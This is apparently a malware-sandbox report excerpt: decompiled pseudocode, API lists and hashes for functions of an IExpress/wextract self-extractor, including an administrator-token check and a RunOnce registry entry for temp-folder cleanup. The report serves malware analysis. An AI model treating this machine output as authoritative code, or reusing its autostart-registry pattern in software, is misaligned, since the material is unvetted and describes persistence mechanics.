                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00104263
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0010427A
                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,001088C0,?,00000001), ref: 0010429F
                                                                                                                                                                                                                                                • CharPrevA.USER32(001088C0,00211181,?,00000001), ref: 001042C2
                                                                                                                                                                                                                                                • CharPrevA.USER32(001088C0,00000000,?,00000001), ref: 001042D6
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00104391
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 001043A5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
• Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                                • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                                • Opcode ID: 0c74bb76ac5e17ddb96692bc2b2d70ac58b139f932b424ee4ace6c955ba4ebfe
                                                                                                                                                                                                                                                • Instruction ID: 97621382d7186e947a0a4b524dd7df3743dba89d9394622b9ce9090324dc714d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c74bb76ac5e17ddb96692bc2b2d70ac58b139f932b424ee4ace6c955ba4ebfe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D841D3B4A04318AFE711AB64EC98A6E7BB4FF45344F94416AFAC1A72D1CBF48C41C761
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E00102773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				char _v269;
                                                                                                                                                                                                                                                				CHAR* _v276;
                                                                                                                                                                                                                                                				int _v280;
                                                                                                                                                                                                                                                				void* _v284;
                                                                                                                                                                                                                                                				int _v288;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t23;
                                                                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                                                                				int _t45;
                                                                                                                                                                                                                                                				int* _t50;
                                                                                                                                                                                                                                                				CHAR* _t52;
                                                                                                                                                                                                                                                				CHAR* _t61;
                                                                                                                                                                                                                                                				char* _t62;
                                                                                                                                                                                                                                                				int _t63;
                                                                                                                                                                                                                                                				CHAR* _t64;
                                                                                                                                                                                                                                                				signed int _t65;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t52 = __ecx;
                                                                                                                                                                                                                                                				_t23 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                                				_t62 = _a4;
                                                                                                                                                                                                                                                				_t50 = 0;
                                                                                                                                                                                                                                                				_t61 = __ecx;
                                                                                                                                                                                                                                                				_v276 = _t62;
                                                                                                                                                                                                                                                				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                                				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                                					_t63 = 0x104;
                                                                                                                                                                                                                                                					goto L14;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t64 = _t62 + 1;
                                                                                                                                                                                                                                                					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                                					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                                					_t63 = 0x104;
                                                                                                                                                                                                                                                					_t34 = _v269;
                                                                                                                                                                                                                                                					if(_t34 == 0x53) {
                                                                                                                                                                                                                                                						L14:
                                                                                                                                                                                                                                                						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                                						goto L15;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if(_t34 == 0x57) {
                                                                                                                                                                                                                                                							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_push(_t52);
                                                                                                                                                                                                                                                							_v288 = 0x104;
                                                                                                                                                                                                                                                							E00101781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                                							_t59 = 0x104;
                                                                                                                                                                                                                                                							E0010658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                                							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                                								L16:
                                                                                                                                                                                                                                                								_t59 = _t63;
                                                                                                                                                                                                                                                								E0010658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								if(RegQueryValueExA(_v284, 0x101140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                                									_t45 = _v280;
                                                                                                                                                                                                                                                									if(_t45 != 2) {
                                                                                                                                                                                                                                                										L9:
                                                                                                                                                                                                                                                										if(_t45 == 1) {
                                                                                                                                                                                                                                                											goto L10;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                                											_t45 = _v280;
                                                                                                                                                                                                                                                											goto L9;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											_t59 = 0x104;
                                                                                                                                                                                                                                                											E00101680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                                											L10:
                                                                                                                                                                                                                                                											_t50 = 1;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								RegCloseKey(_v284);
                                                                                                                                                                                                                                                								L15:
                                                                                                                                                                                                                                                								if(_t50 == 0) {
                                                                                                                                                                                                                                                									goto L16;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00106CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                                			}























                                                                                                                                                                                                                                                0x00102837
                                                                                                                                                                                                                                                0x0010285a
                                                                                                                                                                                                                                                0x0010285c
                                                                                                                                                                                                                                                0x00102865
                                                                                                                                                                                                                                                0x00102892
                                                                                                                                                                                                                                                0x00102895
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102867
                                                                                                                                                                                                                                                0x00102878
                                                                                                                                                                                                                                                0x0010288c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010287a
                                                                                                                                                                                                                                                0x00102880
                                                                                                                                                                                                                                                0x00102885
                                                                                                                                                                                                                                                0x00102897
                                                                                                                                                                                                                                                0x00102899
                                                                                                                                                                                                                                                0x00102899
                                                                                                                                                                                                                                                0x00102878
                                                                                                                                                                                                                                                0x00102865
                                                                                                                                                                                                                                                0x001028a0
                                                                                                                                                                                                                                                0x001028bf
                                                                                                                                                                                                                                                0x001028c1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001028c1
                                                                                                                                                                                                                                                0x00102831
                                                                                                                                                                                                                                                0x001027dd
                                                                                                                                                                                                                                                0x001027d5
                                                                                                                                                                                                                                                0x001028e5

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharUpperA.USER32(B5A2E1BC,00000000,00000000,00000000), ref: 001027A8
                                                                                                                                                                                                                                                • CharNextA.USER32(0000054D), ref: 001027B5
                                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 001027BC
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00102829
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00101140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00102852
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00102870
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001028A0
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 001028AA
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 001028B9
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 001027E4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                                • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                                • Opcode ID: 70c25be2ad3f0a00592cbc59b763bc062576e144fc531a94817abb41b185f94c
                                                                                                                                                                                                                                                • Instruction ID: 8822f4695772b1f8b47b88f45909d4cd982ffe31ce63c0b16052ab51d3839ccf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70c25be2ad3f0a00592cbc59b763bc062576e144fc531a94817abb41b185f94c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B41B675A0012CAFDB249B649C49AEA77BDEF55700F4480A6F6C5D2184DBF04EC58FA1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 62%
                                                                                                                                                                                                                                                			E00102267() {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				char _v836;
                                                                                                                                                                                                                                                				void* _v840;
                                                                                                                                                                                                                                                				int _v844;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t19;
                                                                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                                				intOrPtr* _t42;
                                                                                                                                                                                                                                                				void* _t45;
                                                                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                                				signed int _t51;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t19 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                                				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                                				if( *0x108530 != 0) {
                                                                                                                                                                                                                                                					_push(_t49);
                                                                                                                                                                                                                                                					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                                						_push(_t38);
                                                                                                                                                                                                                                                						_v844 = 0x238;
                                                                                                                                                                                                                                                						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                                							_push(_t47);
                                                                                                                                                                                                                                                							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                                							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                                								E0010658A( &_v268, 0x104, 0x101140);
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                                							E0010171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                                							_t42 =  &_v836;
                                                                                                                                                                                                                                                							_t45 = _t42 + 1;
                                                                                                                                                                                                                                                							_pop(_t47);
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								_t33 =  *_t42;
                                                                                                                                                                                                                                                								_t42 = _t42 + 1;
                                                                                                                                                                                                                                                							} while (_t33 != 0);
                                                                                                                                                                                                                                                							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                                						_pop(_t38);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_pop(_t49);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00106CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 001022A3
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 001022D8
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 001022F5
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00102305
                                                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0010236E
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0010237A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0010232D
                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00102299
                                                                                                                                                                                                                                                • wextract_cleanup2, xrefs: 0010227C, 001022CD, 00102363
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00102321
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
• Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                                                                • API String ID: 3027380567-2274915764
                                                                                                                                                                                                                                                • Opcode ID: 9c6148e652f518d719b31321bfa9b0f6c2e43242ff968d998976782c9d83982f
                                                                                                                                                                                                                                                • Instruction ID: 433f896abad19542dca4e08bbcd525a00c8b1f2a07afab91eeca5aa5089aea52
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c6148e652f518d719b31321bfa9b0f6c2e43242ff968d998976782c9d83982f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1319871A002186BDB219B55DC49FDB7B7CEF54740F4001A5F5CDAA091DBF56B88CA50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                                			E00103100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                                                                				struct HWND__* _t16;
                                                                                                                                                                                                                                                				struct HWND__* _t33;
                                                                                                                                                                                                                                                				struct HWND__* _t34;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                                				if(_t8 == 0) {
                                                                                                                                                                                                                                                					if( *0x108590 == 0) {
                                                                                                                                                                                                                                                						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                                						 *0x108590 = 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L13:
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t11 = _t8 - 1;
                                                                                                                                                                                                                                                				if(_t11 == 0) {
                                                                                                                                                                                                                                                					L7:
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					L8:
                                                                                                                                                                                                                                                					EndDialog(_a4, ??);
                                                                                                                                                                                                                                                					L9:
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                                				if(_t15 == 0) {
                                                                                                                                                                                                                                                					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                                					_t33 = _a4;
                                                                                                                                                                                                                                                					E001043D0(_t33, _t16);
                                                                                                                                                                                                                                                					SetDlgItemTextA(_t33, 0x834,  *0x108d4c);
                                                                                                                                                                                                                                                					SetWindowTextA(_t33, "lenta");
                                                                                                                                                                                                                                                					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                                					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                                					 *0x1088b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                                					SetWindowLongA(_t34, 0xfffffffc, E001030C0);
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t15 != 1) {
                                                                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_a12 != 6) {
                                                                                                                                                                                                                                                					if(_a12 != 7) {
                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push(1);
                                                                                                                                                                                                                                                				goto L8;
                                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 0010313B
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0010314B
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000834), ref: 0010316A
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 00103176
                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0010317D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000834), ref: 00103185
                                                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000FC), ref: 00103190
                                                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000FC,001030C0), ref: 001031A3
                                                                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 001031CA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 33ed0869a18b84c63a6caea1828f1e683c503f5894ac7ef8f5772e8d9001455c
                                                                                                                                                                                                                                                • Instruction ID: d8cf4d62395dfd052b1b1f4ca4e710605cda77ac628705ccafaddcd89653b63b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33ed0869a18b84c63a6caea1828f1e683c503f5894ac7ef8f5772e8d9001455c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3211D331248311BBDB116F24AC0CF9A3A68FF5E720F504620F9E5919E0DBF096C1C782
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                                                                                                                			E001018A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				short _v12;
                                                                                                                                                                                                                                                				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                                				long _v24;
                                                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                                                				void* _v32;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				signed int _t23;
                                                                                                                                                                                                                                                				long _t45;
                                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                                				int _t50;
                                                                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t51 = __esi;
                                                                                                                                                                                                                                                				_t49 = __edx;
                                                                                                                                                                                                                                                				_t23 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                                				_t25 =  *0x108128; // 0x2
                                                                                                                                                                                                                                                				_t45 = 0;
                                                                                                                                                                                                                                                				_v12 = 0x500;
                                                                                                                                                                                                                                                				_t50 = 2;
                                                                                                                                                                                                                                                				_v16.Value = 0;
                                                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                                                				if(_t25 != _t50) {
                                                                                                                                                                                                                                                					L20:
                                                                                                                                                                                                                                                					return E00106CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(E001017EE( &_v20) != 0) {
                                                                                                                                                                                                                                                					_t25 = _v20;
                                                                                                                                                                                                                                                					if(_v20 != 0) {
                                                                                                                                                                                                                                                						 *0x108128 = 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                                					L17:
                                                                                                                                                                                                                                                					CloseHandle(_v28);
                                                                                                                                                                                                                                                					_t25 = _v20;
                                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_push(__esi);
                                                                                                                                                                                                                                                					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                                					if(_t52 == 0) {
                                                                                                                                                                                                                                                						L16:
                                                                                                                                                                                                                                                						_pop(_t51);
                                                                                                                                                                                                                                                						goto L17;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                                						L15:
                                                                                                                                                                                                                                                						LocalFree(_t52);
                                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if( *_t52 <= 0) {
                                                                                                                                                                                                                                                							L14:
                                                                                                                                                                                                                                                							FreeSid(_v32);
                                                                                                                                                                                                                                                							goto L15;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                                						_t50 = _t15;
                                                                                                                                                                                                                                                						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                                							_t45 = _t45 + 1;
                                                                                                                                                                                                                                                							_t50 = _t50 + 8;
                                                                                                                                                                                                                                                							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *0x108128 = 1;
                                                                                                                                                                                                                                                						_v20 = 1;
                                                                                                                                                                                                                                                						goto L14;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 001017EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001018DD), ref: 0010181A
                                                                                                                                                                                                                                                  • Part of subcall function 001017EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0010182C
                                                                                                                                                                                                                                                  • Part of subcall function 001017EE: AllocateAndInitializeSid.ADVAPI32(001018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001018DD), ref: 00101855
                                                                                                                                                                                                                                                  • Part of subcall function 001017EE: FreeSid.ADVAPI32(?,?,?,?,001018DD), ref: 00101883
                                                                                                                                                                                                                                                  • Part of subcall function 001017EE: FreeLibrary.KERNEL32(00000000,?,?,?,001018DD), ref: 0010188A
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 001018EB
                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 001018F2
                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0010190A
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00101918
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,?,?), ref: 0010192C
                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00101944
                                                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00101964
                                                                                                                                                                                                                                                • EqualSid.ADVAPI32(00000004,?), ref: 0010197A
                                                                                                                                                                                                                                                • FreeSid.ADVAPI32(?), ref: 0010199C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 001019A3
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 001019AD
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
